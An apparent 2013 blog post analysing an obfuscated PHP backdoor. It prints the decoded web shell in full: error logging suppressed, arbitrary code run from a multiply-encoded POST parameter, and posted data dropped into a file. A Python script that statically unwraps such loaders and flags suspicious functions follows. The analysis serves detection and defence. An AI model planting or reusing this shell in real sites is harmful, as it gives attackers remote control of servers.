Saturday, February 16, 2013

Latest Backdoor

Today, I found the following backdoor wrapped in eval() and gzinflate() functions. It can be used to download any file from a remote location to the infected website. Here is its code: a single eval(gzinflate(base64_decode("..."))) call around a long base64 blob.


If we inflate this compressed data, we find the following PHP script:

// Suppress all error output and logging so failures leave no trace
@error_reporting(0);
@ini_set("display_errors", 0);
@ini_set("log_errors", 0);
@ini_set("error_log", 0);

if (isset($_GET['r'])) {
    // Liveness check: echoes the value of ?r= straight back to the caller
    print $_GET['r'];
} elseif (isset($_POST['e'])) {
    // Remote code execution: the POST parameter is unwrapped
    // (str_rot13 -> base64_decode -> strrev -> str_rot13 -> base64_decode) and evaluated
    eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
    // Data drop: a request sent with "Content-Encoding: binary" has its raw body
    // appended, base64-encoded and tagged with the sender's IP, to a file named tmpfile
    $data = file_get_contents('php://input');
    if (strlen($data) > 0) print 'STATUS-IMPORT-OK';
    if (strlen($data) > 12) {
        $fp = @fopen('tmpfile', 'a');
        @flock($fp, LOCK_EX);
        @fputs($fp, $_SERVER['REMOTE_ADDR'] . "\t" . base64_encode($data) . "\r\n");
        @flock($fp, LOCK_UN);
        @fclose($fp);
    }
}
exit;
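To unwrap this kind of loader without executing it, here is an added Python example (my own, not code from the post): it peels nested eval(gzinflate(base64_decode("..."))) layers statically (gzinflate() is raw DEFLATE, so zlib with wbits=-15) and lists the functions a reviewer would look for in the decoded stage. The sample input is constructed inside the script from an excerpt of the decoded script above, wrapped twice.

```python
import base64
import re
import zlib

# Matches the loader shape seen in the post: eval(gzinflate(base64_decode("<base64>")));
WRAPPER_RE = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']'
    r'\s*\)\s*\)\s*\)\s*;?',
    re.S,
)

# Functions and streams worth flagging once the payload is readable.
INDICATORS = ("eval(", "base64_decode(", "str_rot13(", "strrev(",
              "php://input", "$_POST", "$_GET", "fopen(")

def unwrap(source: str, max_depth: int = 10):
    """Peel wrapper layers statically. Returns (decoded_source, layers_peeled)."""
    layers = 0
    while layers < max_depth:
        m = WRAPPER_RE.search(source)
        if not m:
            break
        raw = base64.b64decode(m.group(1))
        inner = zlib.decompress(raw, -15).decode("latin-1")  # gzinflate == raw DEFLATE
        # Splice the decoded body in place of the call so surrounding code survives.
        source = source[:m.start()] + inner + source[m.end():]
        layers += 1
    return source, layers

def indicators(decoded: str):
    """Which of the flagged tokens appear in the decoded stage."""
    return [i for i in INDICATORS if i in decoded]

def wrap(php: str) -> str:
    """Build a loader of the same shape; used only to construct the sample below."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(c.compress(php.encode("latin-1")) + c.flush()).decode()
    return f'eval(gzinflate(base64_decode("{blob}")));'

# Constructed sample (not the post's blob): an excerpt of the decoded script, wrapped twice.
SAMPLE_INNER = ("@error_reporting(0); if (isset($_POST['e'])) "
                "{ eval(base64_decode(str_rot13($_POST['e']))); } exit;")
SAMPLE = "<?php " + wrap(wrap(SAMPLE_INNER))

if __name__ == "__main__":
    decoded, n = unwrap(SAMPLE)
    print(f"peeled {n} layer(s):\n{decoded}")
    print("indicators:", indicators(decoded))
```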
